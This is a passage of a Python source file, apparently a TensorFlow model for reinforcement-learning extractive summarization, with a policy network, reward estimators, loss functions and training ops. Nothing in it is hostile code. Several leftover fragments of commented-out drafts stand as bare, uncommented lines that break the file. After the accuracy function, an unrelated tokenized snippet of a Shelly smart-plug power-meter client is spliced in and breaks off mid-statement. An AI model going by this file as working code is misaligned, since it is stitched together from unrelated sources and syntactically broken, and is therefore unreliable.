        sents_ext_shifted = [special_tensor] + sents_ext[:-1]

    # Reshape sents_labels for the RNN (only used for cross-entropy training).
    with variable_scope.variable_scope("Reshape-Label"):
        # only used for training
        sents_labels = reshape_tensor2list(sents_labels, FLAGS.max_doc_length, FLAGS.target_label_size)

    # Define sequential decoder with attention over encoder outputs.
    extractor_outputs, logits = jporg_attentional_seqrnn_decoder(sents_ext_shifted, encoder_outputs, encoder_state, sents_labels, weights, biases)

    # Final logits without softmax.
    with variable_scope.variable_scope("Reshape-Out"):
        logits = reshape_list2tensor(logits, FLAGS.max_doc_length, FLAGS.target_label_size)
        extractor_outputs = reshape_list2tensor(extractor_outputs, FLAGS.max_doc_length, 2 * FLAGS.size)
    return extractor_outputs, logits


def policy_network(vocab_embed_variable, document_placeholder, label_placeholder):
    """Build the policy core network.

    Args:
      vocab_embed_variable: [vocab_size, FLAGS.wordembed_size], embeddings
        without PAD and UNK.
      document_placeholder: [None, (FLAGS.max_doc_length + FLAGS.max_title_length
        + FLAGS.max_image_length), FLAGS.max_sent_length]
      label_placeholder: Gold label [None, FLAGS.max_doc_length,
        FLAGS.target_label_size]; only used during cross-entropy training of
        JP's model.

    Returns:
      Outputs of sentence extractor and logits without softmax.
    """
    with tf.variable_scope('PolicyNetwork') as scope:

        ### Full word-embedding lookup variable
        # PADDING embedding: non-trainable, fixed at zero.
        pad_embed_variable = variable_on_cpu("pad_embed", [1, FLAGS.wordembed_size], tf.constant_initializer(0), trainable=False)
        # UNK embedding: trainable.
        unk_embed_variable = variable_on_cpu("unk_embed", [1, FLAGS.wordembed_size], tf.constant_initializer(0), trainable=True)
        # Get fullvocab_embed_variable: [PAD; UNK; vocab]
        fullvocab_embed_variable = tf.concat(0, [pad_embed_variable, unk_embed_variable, vocab_embed_variable])
        # print(fullvocab_embed_variable)

        ### Lookup layer
        with tf.variable_scope('Lookup') as scope:
            document_placeholder_flat = tf.reshape(document_placeholder, [-1])
            document_word_embedding = tf.nn.embedding_lookup(fullvocab_embed_variable, document_placeholder_flat, name="Lookup")
            document_word_embedding = tf.reshape(document_word_embedding, [-1, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.max_sent_length, FLAGS.wordembed_size])
            # print(document_word_embedding)

        ### Convolution layer: sentence representations from word embeddings
        with tf.variable_scope('ConvLayer') as scope:
            document_word_embedding = tf.reshape(document_word_embedding, [-1, FLAGS.max_sent_length, FLAGS.wordembed_size])
            document_sent_embedding = conv1d_layer_sentence_representation(document_word_embedding)  # [None, sentembed_size]
            document_sent_embedding = tf.reshape(document_sent_embedding, [-1, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.sentembed_size])
            # print(document_sent_embedding)

        ### Reshape tensor to list:
        ### [-1, (max_doc_length+max_title_length+max_image_length), sentembed_size] -> list of [-1, sentembed_size]
        with variable_scope.variable_scope("ReshapeDoc_TensorToList"):
            document_sent_embedding = reshape_tensor2list(document_sent_embedding, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.sentembed_size)
            # print(document_sent_embedding)

        # document_sents_enc: sentences fed to the encoder (optionally reversed)
        document_sents_enc = document_sent_embedding[:FLAGS.max_doc_length]
        if FLAGS.doc_encoder_reverse:
            document_sents_enc = document_sents_enc[::-1]

        # document_sents_ext: sentences fed to the extractor
        document_sents_ext = document_sent_embedding[:FLAGS.max_doc_length]

        # document_sents_titimg: title and image embeddings
        document_sents_titimg = document_sent_embedding[FLAGS.max_doc_length:]

        ### Document encoder
        with tf.variable_scope('DocEnc') as scope:
            encoder_outputs, encoder_state = simple_rnn(document_sents_enc)

        ### Sentence label extractor: pick variant from flags/inputs
        with tf.variable_scope('SentExt') as scope:
            if (FLAGS.attend_encoder) and (len(document_sents_titimg) != 0):
                # Multiple decoder
                # TODO(review): exit(0) signals success; consider raising
                # NotImplementedError instead.
                print("Multiple decoder is not implement yet.")
                exit(0)
                # # Decoder to attend captions
                # attendtitimg_extractor_output, _ = simple_attentional_rnn(document_sents_ext, document_sents_titimg, initial_state=encoder_state)
                # # Attend previous decoder
                # logits = sentence_extractor_seqrnn_docatt(document_sents_ext, attendtitimg_extractor_output, encoder_state, label_placeholder)
            elif (not FLAGS.attend_encoder) and (len(document_sents_titimg) != 0):
                # Attend only title/images during decoding.
                extractor_output, logits = sentence_extractor_nonseqrnn_titimgatt(document_sents_ext, encoder_state, document_sents_titimg)
            elif (FLAGS.attend_encoder) and (len(document_sents_titimg) == 0):
                # JP model: attend encoder.
                # BUGFIX: original assigned `extractor_outputs` here but the
                # function returns `extractor_output`, raising NameError on
                # this branch; names unified.
                extractor_output, logits = sentence_extractor_seqrnn_docatt(document_sents_ext, encoder_outputs, encoder_state, label_placeholder)
            else:
                # Attend nothing.
                extractor_output, logits = sentence_extractor_nonseqrnn_noatt(document_sents_ext, encoder_state)

    # print(extractor_output)
    # print(logits)
    return extractor_output, logits


def baseline_future_reward_estimator(extractor_output):
    """Implements linear regression to estimate future rewards (per sentence).

    Args:
      extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.size or 2*FLAGS.size]
    Output:
      rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
    """
    with tf.variable_scope('FutureRewardEstimator') as scope:
        last_size = extractor_output.get_shape()[2].value

        # Define regression variables.
        weight = variable_on_cpu('weight', [last_size, 1], tf.random_normal_initializer())
        bias = variable_on_cpu('bias', [1], tf.random_normal_initializer())

        extractor_output_forreward = tf.reshape(extractor_output, [-1, last_size])
        future_rewards = tf.matmul(extractor_output_forreward, weight) + bias
        # future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length, 1]
        future_rewards = tf.reshape(future_rewards, [-1, FLAGS.max_doc_length, 1])
        future_rewards = tf.squeeze(future_rewards)
    return future_rewards


def baseline_single_future_reward_estimator(extractor_output):
    """Implements linear regression to estimate a single future reward for
    the whole document.

    Args:
      extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.size or 2*FLAGS.size]
    Output:
      rewards: [FLAGS.batch_size]
    """
    with tf.variable_scope('FutureRewardEstimator') as scope:
        last_size = extractor_output.get_shape()[2].value

        # Define regression variables over the flattened document.
        weight = variable_on_cpu('weight', [FLAGS.max_doc_length * last_size, 1], tf.random_normal_initializer())
        bias = variable_on_cpu('bias', [1], tf.random_normal_initializer())

        # [FLAGS.batch_size, FLAGS.max_doc_length*(FLAGS.size or 2*FLAGS.size)]
        extractor_output_forreward = tf.reshape(extractor_output, [-1, FLAGS.max_doc_length * last_size])
        future_rewards = tf.matmul(extractor_output_forreward, weight) + bias  # [FLAGS.batch_size, 1]
        # future_rewards: [FLAGS.batch_size, 1] -> [FLAGS.batch_size]
        future_rewards = tf.squeeze(future_rewards)
    return future_rewards


### Loss Functions

def mean_square_loss_doclevel(future_rewards, actual_reward):
    """Implements mean square loss for future reward prediction (doc level).

    Args:
      future_rewards: [FLAGS.batch_size]
      actual_reward: [FLAGS.batch_size]
    Output:
      Float value.
    """
    with tf.variable_scope('MeanSquareLoss') as scope:
        sq_loss = tf.square(future_rewards - actual_reward)  # [FLAGS.batch_size]
        mean_sq_loss = tf.reduce_mean(sq_loss)
        tf.add_to_collection('mean_square_loss', mean_sq_loss)
    return mean_sq_loss


def mean_square_loss(future_rewards, actual_reward, weights):
    """Implements mean square loss for future reward prediction (per sentence).

    Args:
      future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
      actual_reward: [FLAGS.batch_size]
      weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
    Output:
      Float value.
    """
    with tf.variable_scope('MeanSquareLoss') as scope:
        actual_reward = tf.expand_dims(actual_reward, 1)  # [FLAGS.batch_size, 1]
        sq_loss = tf.square(future_rewards - actual_reward)  # [FLAGS.batch_size, FLAGS.max_doc_length]

        mean_sq_loss = 0
        if FLAGS.weighted_loss:
            # Mask padded sentences and average over valid ones only.
            sq_loss = tf.mul(sq_loss, weights)
            sq_loss_sum = tf.reduce_sum(sq_loss)
            valid_sentences = tf.reduce_sum(weights)
            mean_sq_loss = sq_loss_sum / valid_sentences
        else:
            mean_sq_loss = tf.reduce_mean(sq_loss)

        tf.add_to_collection('mean_square_loss', mean_sq_loss)
    return mean_sq_loss


def cross_entropy_loss(logits, labels, weights):
    """Estimate cost of predictions.
    Add summary for "cost" and "cost/avg".

    Args:
      logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      labels: Sentence extraction gold labels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
    Returns:
      Cross-entropy cost.
    """
    with tf.variable_scope('CrossEntropyLoss') as scope:
        # Reshape logits and labels to match the requirement of
        # softmax_cross_entropy_with_logits.
        logits = tf.reshape(logits, [-1, FLAGS.target_label_size])  # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
        labels = tf.reshape(labels, [-1, FLAGS.target_label_size])  # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels)  # [FLAGS.batch_size*FLAGS.max_doc_length]
        cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length])  # [FLAGS.batch_size, FLAGS.max_doc_length]
        if FLAGS.weighted_loss:
            cross_entropy = tf.mul(cross_entropy, weights)

        # Cross entropy / document
        cross_entropy = tf.reduce_sum(cross_entropy, reduction_indices=1)  # [FLAGS.batch_size]
        cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')

        # ## Cross entropy / sentence
        # cross_entropy_sum = tf.reduce_sum(cross_entropy)
        # valid_sentences = tf.reduce_sum(weights)
        # cross_entropy_mean = cross_entropy_sum / valid_sentences

        tf.add_to_collection('cross_entropy_loss', cross_entropy_mean)
    return cross_entropy_mean


def predict_labels(logits):
    """Predict labels from logits (hard arg-max decisions).

    Args:
      logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    Returns:
      One-hot labels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    """
    with tf.variable_scope('PredictLabels') as scope:
        # Reshape logits for argmax and argmin.
        logits = tf.reshape(logits, [-1, FLAGS.target_label_size])  # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]

        # Get labels predicted using these logits.
        logits_argmax = tf.argmax(logits, 1)  # [FLAGS.batch_size*FLAGS.max_doc_length]
        logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length])  # [FLAGS.batch_size, FLAGS.max_doc_length]
        logits_argmax = tf.expand_dims(logits_argmax, 2)  # [FLAGS.batch_size, FLAGS.max_doc_length, 1]

        logits_argmin = tf.argmin(logits, 1)  # [FLAGS.batch_size*FLAGS.max_doc_length]
        logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length])  # [FLAGS.batch_size, FLAGS.max_doc_length]
        logits_argmin = tf.expand_dims(logits_argmin, 2)  # [FLAGS.batch_size, FLAGS.max_doc_length, 1]

        # Convert argmin and argmax to one-hot labels; works only if
        # FLAGS.target_label_size = 2.
        labels = tf.concat(2, [logits_argmin, logits_argmax])  # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
        dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
        labels = tf.cast(labels, dtype)
        return labels


def estimate_ltheta_ot(logits, labels, future_rewards, actual_rewards, weights):
    """Estimate the policy-gradient term d L(theta) / d o_t.

    Args:
      logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      labels: Label placeholder for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
      actual_rewards: [FLAGS.batch_size]
      weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
    Returns:
      [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    """
    with tf.variable_scope('LTheta_Ot') as scope:
        # Get reward weights: external reward - predicted reward.
        # tile/reshape/transpose broadcasts the per-document reward over
        # all sentence positions: [a,b] * 3 = [a,b,a,b,a,b] -> [[a,a,a],[b,b,b]]
        actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length])  # [FLAGS.batch_size * FLAGS.max_doc_length]
        actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1])  # [FLAGS.max_doc_length, FLAGS.batch_size]
        actual_rewards = tf.transpose(actual_rewards)  # [FLAGS.batch_size, FLAGS.max_doc_length]

        diff_act_pred = actual_rewards - future_rewards  # [FLAGS.batch_size, FLAGS.max_doc_length]
        diff_act_pred = tf.expand_dims(diff_act_pred, 2)  # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
        # Duplicate along label axis (FLAGS.target_label_size = 2).
        diff_act_pred = tf.concat(2, [diff_act_pred, diff_act_pred])  # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]

        # Softmax over logits.
        logits = tf.reshape(logits, [-1, FLAGS.target_label_size])  # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
        logits = tf.nn.softmax(logits)
        logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])  # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]

        # Get the difference (softmax - indicator).
        diff_logits_indicator = logits - labels  # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]

        # Multiply with reward difference.
        d_ltheta_ot = tf.mul(diff_act_pred, diff_logits_indicator)  # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]

        # Multiply with padding weights (duplicated along label axis).
        weights = tf.expand_dims(weights, 2)  # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
        weights = tf.concat(2, [weights, weights])  # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
        d_ltheta_ot = tf.mul(d_ltheta_ot, weights)  # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]

        return d_ltheta_ot

# NOTE(review): a truncated commented-out draft of estimate_ltheta_ot_mixer
# followed here in the original and was removed as dead code.
#
logits_reward_list = logits_list[crossentryloss_length:] # logits_reward = reshape_list2tensor(logits_reward_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size] # # Crossentropy loss with gold labels: partition gold_labels # labels_gold_list = reshape_tensor2list(labels_gold, FLAGS.max_doc_length, FLAGS.target_label_size) # labels_gold_used_list = labels_gold_list[0:crossentryloss_length] # labels_gold_used = reshape_list2tensor(labels_gold_used_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size] # # d_ltheta_ot : cross entropy # diff_logits_goldlabels = logits_ce_gold - labels_gold_used # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size] # # Policy gradient for rest # # Get Reward Weights: External reward - Predicted reward # actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b] # actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]] # actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]] # diff_act_pred = actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length] # diff_act_pred = tf.expand_dims(diff_act_pred, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1] # # Convert (FLAGS.target_label_size = 2) # diff_act_pred = tf.concat(2, [diff_act_pred, diff_act_pred]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # # Get used reward diff # diff_act_pred_list = reshape_tensor2list(diff_act_pred, FLAGS.max_doc_length, FLAGS.target_label_size) # diff_reward_act_pred_used_list = diff_act_pred_list[crossentryloss_length:] # diff_reward_act_pred_used = reshape_list2tensor(diff_reward_act_pred_used_list, policygradloss_length, FLAGS.target_label_size) # 
# (end of commented-out estimate_ltheta_ot_mixer draft)


def reward_weighted_cross_entropy_loss_multisample(logits, labels, actual_rewards, weights):
    """Estimate cost of predictions, weighted by sampled rewards.
    Add summary for "cost" and "cost/avg".

    Args:
      logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      labels: Label placeholder for multiple sampled predictions
        [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size]
      actual_rewards: [FLAGS.batch_size, 1]
      weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
    Returns:
      Reward-weighted cross-entropy cost.
    """
    with tf.variable_scope('RWCELossMultiSample') as scope:
        # Expand logits and weights for roll outs (single rollout dimension).
        logits_temp = tf.expand_dims(logits, 1)  # [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size]
        weights_temp = tf.expand_dims(weights, 1)  # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
        logits_expanded = logits_temp
        weights_expanded = weights_temp
        # for ridx in range(1,FLAGS.num_sample_rollout):
        #   logits_expanded = tf.concat(1, [logits_expanded, logits_temp])   # [FLAGS.batch_size, n++, FLAGS.max_doc_length, FLAGS.target_label_size]
        #   weights_expanded = tf.concat(1, [weights_expanded, weights_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length]

        # Reshape logits and labels to match the requirement of
        # softmax_cross_entropy_with_logits.
        logits_expanded = tf.reshape(logits_expanded, [-1, FLAGS.target_label_size])  # [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size]
        labels = tf.reshape(labels, [-1, FLAGS.target_label_size])  # [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size]
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits_expanded, labels)  # [FLAGS.batch_size*1*FLAGS.max_doc_length]
        cross_entropy = tf.reshape(cross_entropy, [-1, 1, FLAGS.max_doc_length])  # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
        if FLAGS.weighted_loss:
            cross_entropy = tf.mul(cross_entropy, weights_expanded)  # [FLAGS.batch_size, 1, FLAGS.max_doc_length]

        # Broadcast the per-sample rewards over all sentence positions:
        # [[a,b],[c,d],[e,f]] 3x2 => ... => [[[a,a],[b,b]], [[c,c],[d,d]], [[e,e],[f,f]]]
        actual_rewards = tf.reshape(actual_rewards, [-1])  # [FLAGS.batch_size*1]
        actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length])  # [FLAGS.batch_size * 1 * FLAGS.max_doc_length]
        actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1])  # [FLAGS.max_doc_length, FLAGS.batch_size*1]
        actual_rewards = tf.transpose(actual_rewards)  # [FLAGS.batch_size*1, FLAGS.max_doc_length]
        actual_rewards = tf.reshape(actual_rewards, [-1, 1, FLAGS.max_doc_length])  # [FLAGS.batch_size, 1, FLAGS.max_doc_length]

        # Multiply with reward.
        reward_weighted_cross_entropy = tf.mul(cross_entropy, actual_rewards)  # [FLAGS.batch_size, 1, FLAGS.max_doc_length]

        # Cross entropy / sample / document.
        reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=2)  # [FLAGS.batch_size, 1]
        reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcemultisample')

        tf.add_to_collection('reward_cross_entropy_loss_multisample', reward_weighted_cross_entropy_mean)
        return reward_weighted_cross_entropy_mean


def reward_weighted_cross_entropy_loss(logits, labels, actual_rewards, weights):
    """Estimate cost of predictions, weighted by the document reward.
    Add summary for "cost" and "cost/avg".

    Args:
      logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      labels: Label placeholder for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      actual_rewards: [FLAGS.batch_size]
      weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
    Returns:
      Reward-weighted cross-entropy cost.
    """
    with tf.variable_scope('RewardWeightedCrossEntropyLoss') as scope:
        # Reshape logits and labels to match the requirement of
        # softmax_cross_entropy_with_logits.
        logits = tf.reshape(logits, [-1, FLAGS.target_label_size])  # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
        labels = tf.reshape(labels, [-1, FLAGS.target_label_size])  # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels)  # [FLAGS.batch_size*FLAGS.max_doc_length]
        cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length])  # [FLAGS.batch_size, FLAGS.max_doc_length]
        if FLAGS.weighted_loss:
            cross_entropy = tf.mul(cross_entropy, weights)  # [FLAGS.batch_size, FLAGS.max_doc_length]

        # Broadcast the per-document reward over all sentence positions:
        # [a,b] * 3 = [a,b,a,b,a,b] -> [[a,b],[a,b],[a,b]] -> [[a,a,a],[b,b,b]]
        actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length])  # [FLAGS.batch_size * FLAGS.max_doc_length]
        actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1])  # [FLAGS.max_doc_length, FLAGS.batch_size]
        actual_rewards = tf.transpose(actual_rewards)  # [FLAGS.batch_size, FLAGS.max_doc_length]

        # Multiply with reward.
        reward_weighted_cross_entropy = tf.mul(cross_entropy, actual_rewards)  # [FLAGS.batch_size, FLAGS.max_doc_length]

        # Cross entropy / document.
        reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1)  # [FLAGS.batch_size]
        reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')

        tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean)
        return reward_weighted_cross_entropy_mean

# NOTE(review): truncated commented-out drafts of older reward-weighted loss
# variants followed here in the original and were removed as dead code.
#
cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # if FLAGS.weighted_loss: # cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length] # # Multiply with reward # reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length] # # Cross entroy / document # reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size] # reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy') # tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean) # return reward_weighted_cross_entropy_mean # def temp_reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights): # """Estimate cost of predictions # Add summary for "cost" and "cost/avg". # Args: # logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length] # actual_reward: [FLAGS.batch_size] # weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] # Returns: # Cross-entropy Cost # """ # with tf.variable_scope('TempRewardWeightedCrossEntropyLoss') as scope: # # Get Reward Weights: External reward - Predicted reward # actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b] # actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]] # actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]] # diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards 
# NOTE(review): several fully commented-out, superseded loss/training variants
# (weighted_cross_entropy_loss, cross_entropy_loss_selfprediction, older
# train_neg_expectedreward versions) were removed here; recover them from
# version control if ever needed.

### Training functions

def train_cross_entropy_loss(cross_entropy_loss):
    """Pretraining with gold labels so the policy starts from a sensible point.

    Args:
        cross_entropy_loss: scalar cross-entropy loss tensor.

    Returns:
        A training op applying Adam gradients to the "PolicyNetwork" variables.
    """
    with tf.variable_scope('TrainCrossEntropyLoss') as scope:
        optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
        # Only the policy-network variables are updated by this op.
        policy_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
        policy_grads = optimizer.compute_gradients(cross_entropy_loss, var_list=policy_vars)
        return optimizer.apply_gradients(policy_grads)


def train_meansq_loss(futreward_meansq_loss):
    """Trains the future-reward estimator on its mean-squared loss.

    Args:
        futreward_meansq_loss: scalar mean-squared-error loss tensor.

    Returns:
        A training op applying Adam gradients to "FutureRewardEstimator".
    """
    with tf.variable_scope('TrainMeanSqLoss') as scope:
        optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
        # Gradients are restricted to the future-reward estimator variables.
        estimator_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="FutureRewardEstimator")
        estimator_grads = optimizer.compute_gradients(futreward_meansq_loss, var_list=estimator_vars)
        return optimizer.apply_gradients(estimator_grads)


def train_neg_expectedreward(reward_weighted_cross_entropy_loss_multisample):
    """Policy-gradient training: optimizes the expected reward.

    Args:
        reward_weighted_cross_entropy_loss_multisample: scalar loss tensor
            (reward-weighted cross entropy over multiple samples).

    Returns:
        A training op applying norm-clipped Adam gradients to "PolicyNetwork".
    """
    with tf.variable_scope('TrainExpReward') as scope:
        optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
        policy_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
        policy_grads = optimizer.compute_gradients(
            reward_weighted_cross_entropy_loss_multisample, var_list=policy_vars)
        # Clip each gradient by norm (Pascanu et al. 2013) to counter the
        # exploding-gradient problem.
        clipped_grads = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in policy_grads]
        return optimizer.apply_gradients(clipped_grads)
### Accuracy Calculations

def accuracy(logits, labels, weights):
    """Average per-sentence prediction accuracy.

    Args:
        logits: Logits from inference().
            [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
        labels: Gold sentence-extraction labels.
            [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
        weights: Mask excluding the padded part.
            [FLAGS.batch_size, FLAGS.max_doc_length]

    Returns:
        Scalar tensor: mean accuracy (weighted per document when
        FLAGS.weighted_loss is set).
    """
    # TODO(review): improve to score only the top-ranked sentences, not all.
    with tf.variable_scope('Accuracy') as scope:
        flat_logits = tf.reshape(logits, [-1, FLAGS.target_label_size])
        flat_labels = tf.reshape(labels, [-1, FLAGS.target_label_size])
        # A prediction is correct when argmax of logits matches argmax of labels.
        correct = tf.equal(tf.argmax(flat_logits, 1), tf.argmax(flat_labels, 1))
        correct = tf.reshape(correct, [-1, FLAGS.max_doc_length])
        correct = tf.cast(correct, tf.float32)
        accuracy = tf.reduce_mean(correct, name='accuracy')
        if FLAGS.weighted_loss:
            # Ignore padded sentences and average per document length.
            correct = tf.mul(correct, weights)
            per_doc_correct = tf.reduce_sum(correct, reduction_indices=1)
            doc_lengths = tf.reduce_sum(weights, reduction_indices=1)
            per_doc_avg = tf.div(per_doc_correct, doc_lengths)
            accuracy = tf.reduce_mean(per_doc_avg, name='accuracy')
    return accuracy
<import_from_future_stmt> annotations<import_stmt>logging<import_stmt>requests<import_stmt>time<import_from_stmt>.errors ConnectionError<import_from_stmt>.powermeter PowerMeasurementResult PowerMeter<line_sep>_LOGGER=logging.getLogger("measure")<class_stmt>ShellyApi<block_start>status_endpoint="/status"<line_sep>meter_endpoint="/meter/0"<def_stmt>parse_json self json:str<arrow>tuple(float float)<block_start><pass><block_end><block_end><class_stmt>ShellyApiGen1(ShellyApi)<block_start>api_version=1<def_stmt>parse_json self json<arrow>tuple(float float)<block_start><return>(float(json["power"]) float(json["timestamp"]))<block_end><block_end><class_stmt>ShellyApiGen2(ShellyApi)<block_start>api_version=2<line_sep>status_endpoint="/rpc/Shelly.GetStatus"<line_sep>meter_endpoint="/rpc/Switch.GetStatus?id=0"<def_stmt>parse_json self json<arrow>tuple(float float)<block_start><return>(float(json["apower"]) time.time())<block_end><block_end><class_stmt>ShellyPowerMeter(PowerMeter)<block_start><def_stmt>__init__ self shelly_ip:str timeout:int=5<block_start>self.timeout=timeout<line_sep>self.ip_address=shelly_ip<line_sep>self.api=self.detect_api_type()<block_end><def_stmt>get_power self<arrow>PowerMeasurementResult<block_start>r=requests.get("http://{}{}".format(self.ip_address self.api.meter_endpoint) timeout=self.timeout)<line_sep>json=r.json()<line_sep>power=self.api.parse_json(json)<line_sep><return>PowerMeasurementResult(power[0] power[1])<block_end><def_stmt>detect_api_type self<arrow>ShellyApi<block_start><for_stmt>api (ShellyApiGen1() ShellyApiGen2())<block_start><try_stmt><block_start>uri="http://{}{}".format(self.ip_address api.status_endpoint)<line_sep>_LOGGER.debug(f"Checking API connection: {uri}")<line_sep>response=requests.get(uri 